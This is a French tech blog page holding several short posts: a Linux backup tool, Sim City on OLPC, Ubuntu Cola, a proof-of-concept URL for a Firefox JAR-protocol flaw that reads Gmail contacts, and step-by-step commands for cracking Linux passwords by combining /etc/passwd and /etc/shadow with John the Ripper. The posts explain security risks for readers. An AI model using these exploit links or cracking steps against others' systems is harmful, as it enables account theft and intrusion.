Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Capture d'écran de l'interface de la Time Machine sur Linux

Un des points sur lesquels insiste bien Apple au sujet de son dernier née MacOS X Leopard, c’est la fonctionnalité de « Time Machine » (Machine temporelle). En fait, il s’agit d’un outil de sauvegarde de fichiers ultra simple a utiliser, permettant de retrouver des fichiers effacés ou modifiés à une date antérieure.

Alors évidement, sous Windows, il y a un truc qui s’appelle Backup and Restore et qui fonctionne une fois sur 2…Et sous Linux, il faut soit se débrouiller avec un petit script qui backup vos fichiers régulièrement, soit installer un clone de la « Time Machine »…

C’est l’objectif de FlyBack. Rendre la sauvegarde tellement simple que même votre grand mère pourrait faire ses backups sous linux. Pour le moment, c’est encore le début du projet et c’est moins joli que sous Mac (mais c’est prévu dans la roadmap d’intégrer des fenêtres qui volent), et j’espère que la sauce prendra car franchement, qu’y a t il de plus important que les backups ? (Mis à part les backups de backup ;-))

Si vous voulez tester, c’est dispo par ici.


Illustration de la ville de Sim City avec des personnages jouant
Electronic Arts en accord avec John Gilmore, le directeur du projet OLPC (One Laptop Per Child) va installer sur les PC la première version de Sim City (1989). Je trouve que c’est vraiment du foutage de gueule ! le jeu est carrement dépassé… Ils auraient pu mettre au minimum Sim City 2000 !

Enfin, ça les changera des sites porno !

Arf !

Source


Capture d'écran montrant une fenêtre de commande avec des commandes pour exploiter la faille JAR

Je vous avais parlé il y a quelques jours d’une nouvelle faille touchant Firefox et toutes les applications web qui acceptent de recevoir en upload des fichiers zip, jar ou odt, et doc 2007… Bref, tous les types de fichiers basés sur le protocole d’archivage JAR.

Trêve de blabla, voici un premier POC (Proof of Concept) qui démontre la gravité de la chose.

jar:http://groups.google.com/searchhistory/url?url=http://beford.org/stuff/htm.jar!/htm.htm

Si vous appelez ce lien (inoffensif je vous rassure), celui-ci executera un petit javascript qui fera croire à Google qu’il vient de son domaine (google.com) et qui lui ouvrira certaines portes comme par exemple ici l’accès à votre liste de contact Gmail. Ce script ne fait rien de méchant mais d’autres pourraient se servir de ces emails pour du spam par exemple.

Ca c’est pour le fun… maintenant, imaginez que vous vouliez récupérer la liste des fichiers ou des codes sources se trouvant dans un répertoire… En théorie, c’est possible aussi vu que le .htm contenu dans le JAR est exécuté comme si il était dans le dossier du site (donc comme si vous l’aviez envoyé directement en FTP)

Même chose en uploadant une fausse page internet d’une banque par exemple, on pourrait vous demander des informations confidentielles (ou en récupérer) sans que vous soyez vigilant.

Flippant non ?

Voici par exemple, une première liste de sites que le papa de la faille a testé et qui sont faillibles. Les noms de domaines sont censurés.

jar:http://imagXXXload.biz/files/dadfad6e3ba807aa20712fbe2.png!/test.html
jar:http://img3.freeimXXXhosting.net/uploads/328d2315c3.png!/test.html
jar:http://www.imglXXXtr.com/uploads/7accc832a7.png!/test.html
jar:http://upload.iXXXpot.com/u/07/311/05/test64864.zip.png!/test.html
jar:http://www.direcXXXload.com/showoriginal-32664.jpg!/test.html
jar:http://www.uplXXXhouse.com/fileuploads/712/712277d886fa0881092da4936f5ded10e771cd.png!/test.html
jar:http://www.fotopaXXXd.com/upload/nr/486/test.zip.png!/test.html
jar:http://www.uploXXXimages.net/imagen/18790b0b47.png!/test.html
jar:http://www.imaXXX.info/images/06/1194534977_test.zip.png!/test.html
jar:http://pics.fXXXni.de/save/p_1194532832.png!/test.html
jar:http://img.nXXXnternetstate.com/1194532968.png!/test.html

Evidement, pour le moment, c’est une grosse brêche encore ouverte parce que Firefox n’a pas encore été mis à jour. Prudence donc dans vos surfs à venir et attendez vous à voir une augmentation des alertes virales et des piratages dans les jours/mois qui vont arriver…

A bon entendeur…


Capture d'écran montrant une fenêtre de commande avec des commandes pour exploiter la faille JAR

Pour trouver le mot de passe linux d’une machine, c’est assez simple mais ça prend du temps… Tout d’abord, il vous faut un petit logiciel open source qui s’appelle John (John The Ripper pour être précis).

La fonction de John est de tester toutes les combinaisons possibles soit d’une liste de mot, soit de manière incrémentale pour faire correspondre le hash du mot de passe crypté avec celui du mot testé.

Bref, vous l’aurez compris, ça peut prendre du temps si le mot de passe est bien long et bien complexe.

Avant de commencer, installez John (méthode Ubuntu ou Debian avec APT) :

sudo apt-get install john

Ensuite, il faut re-assembler les fichiers passwd et shadow… Sous linux, les fichiers contenant les mots de passe sont divisés en 2 et stockés dans le répertoire /etc/

/etc/passwd contient uniquement les logins, les chemins des Home, les groupes…etc mais pas le mot de passe. Ce dernier est quand à lui stocké dans /etc/shadow de façon cryptée.

Donc pour pouvoir cracker ce mot de passe, il faut « re-assembler » les 2 fichiers pour n’en former plus qu’un seul. C’est ce que la command unshadow va nous permettre de faire. Il faut bien sûr être loggé avec un compte administrateur ou root pour pouvoir accèder aux fichiers de /etc/

sudo unshadow /etc/passwd /etc/shadow > mypasswd

Ensuite, il vous suffit de lancer John

sudo john mypasswd

Et c’est parti pour de longues heures si vous avez de la chance (ou des mois et des mois si vous en avez moins)

Une fois que John aura fini son travail, il ne vous restera plus qu’a afficher ce mot de passe avec la commande suivante :

sudo john –show mypasswd

Et voilà… Bon, je vous rappelle quand même que ces petites manipulations ne doivent être réalisées que sur votre propre machine pour tester la sécurité de vos propres mots de passe.

En ce qui concerne John, il est paramétrable dans tous les sens donc si vous voulez aller un peu plus loin dans le truc, je vous recommande ce site.


Bouteille de Ubuntu Cola avec logo et slogan
Ubuntu Cola, c’est le nom de cette boisson gazeuse ciblée commerce équitable… Rien à voir avec le système d’exploitation Ubuntu mis à part le concept orienté « Humain ».

Partenaire d’un programme économique et environmental avec des producteurs de sucre, la société reverse 33 % de ses recettes en Afrique. Ce qui est amusant avec cette boisson c’est la confusion qui s’installe avec l’OS. J’aurais tendance à dire que les gens vont l’acheter, plus parce qu’ils se sentent proches de la philosophie de la distrib Ubuntu que pour aider l’Afrique… Mais je me trompe peut être.

Personne buvant du Ubuntu Cola devant un ordinateur avec des stickers Ubuntu

D’ailleurs, petit rappel sur la significarion d’Ubuntu. Ce mot provient dé??un ancien mot bantou (langue d’Afrique), ubuntu, signifiant « Humanité aux autres » ou encore « Je suis ce que je suis grâce à ce que nous sommes tous ». Donc finalement, c’est un mot comme les autres qui peut être utilisé pour tout et n’importe quoi, même si il est chargé d’une signification assez forte.

Pour le moment, cette boisson est sortie en Angleterre (sa terre natale) et commence à débarquer dans d’autres pays d’Europe comme la Suède. Va falloir que j’y goute ça quand même 🙂

Toutes les infos sont ici